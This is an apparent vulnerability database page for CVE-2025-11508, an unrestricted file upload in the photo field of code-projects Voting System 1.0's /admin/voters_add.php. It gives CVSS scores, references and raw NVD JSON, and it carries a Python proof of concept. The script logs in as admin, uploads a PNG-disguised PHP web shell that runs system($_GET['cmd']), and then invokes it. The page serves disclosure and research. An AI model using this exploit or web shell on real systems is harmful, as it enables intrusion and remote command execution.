CVE-2025-11508

Description

A security vulnerability has been detected in code-projects Voting System 1.0. This affects an unknown function of the file /admin/voters_add.php. Such manipulation of the argument photo leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:voting_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Voting System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11508 PoC - Unrestricted File Upload in code-projects Voting System 1.0
# Affected file: /admin/voters_add.php
# Vulnerable parameter: photo

import requests

# Target configuration
TARGET_URL = "http://target.com"
ADMIN_LOGIN_URL = f"{TARGET_URL}/admin/"
UPLOAD_URL = f"{TARGET_URL}/admin/voters_add.php"

# Attacker credentials (requires high privilege - PR:H)
USERNAME = "admin"
PASSWORD = "admin123"

# Create a session to maintain cookies
session = requests.Session()

# Step 1: Login as administrator
login_data = {
    "username": USERNAME,
    "password": PASSWORD,
    "login": "submit"
}
response = session.post(ADMIN_LOGIN_URL, data=login_data)
print(f"[*] Login response status: {response.status_code}")

# Step 2: Prepare malicious PHP webshell disguised as image
# The file contains PHP code but uses image extension bypass techniques
malicious_content = b"\x89PNG\r\n\x1a\n"  # PNG magic bytes to bypass content checks
malicious_content += b"<?php echo 'PWNED'; system($_GET['cmd']); ?>"

# Step 3: Upload malicious file via the vulnerable photo parameter
files = {
    "photo": ("shell.php", malicious_content, "image/png")
}

form_data = {
    "voters_id": "12345",
    "firstname": "test",
    "lastname": "test",
    "username": "testuser",
    "password": "testpass",
    "Add": "Add"
}

response = session.post(UPLOAD_URL, files=files, data=form_data)
print(f"[*] Upload response status: {response.status_code}")
print(f"[*] Response body: {response.text[:500]}")

# Step 4: Access the uploaded webshell
# The shell is typically saved in /admin/uploads/ or similar directory
shell_url = f"{TARGET_URL}/admin/uploads/shell.php?cmd=id"
response = requests.get(shell_url)
print(f"[*] Shell access status: {response.status_code}")
print(f"[*] Command output: {response.text}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11508
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11508
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11508/
[4] VulDB https://vuldb.com/cve/CVE-2025-11508
[5] https://code-projects.org/
[6] https://github.com/underatted/CVE/issues/13
[7] https://vuldb.com/?ctiid.327633
[8] https://vuldb.com/?id.327633
[9] https://vuldb.com/?submit.669458
[10] https://github.com/underatted/CVE/issues/13

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11508", "sourceIdentifier": "[email protected]", "published": "2025-10-08T23:15:30.760", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in code-projects Voting System 1.0. This affects an unknown function of the file /admin/voters_add.php. Such manipulation of the argument photo leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:voting_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "4E13B3D0-152B-4882-B657-ABADBF2FCAE5"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/underatted/CVE/issues/13", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327633", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327633", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.669458", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/underatted/CVE/issues/13", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}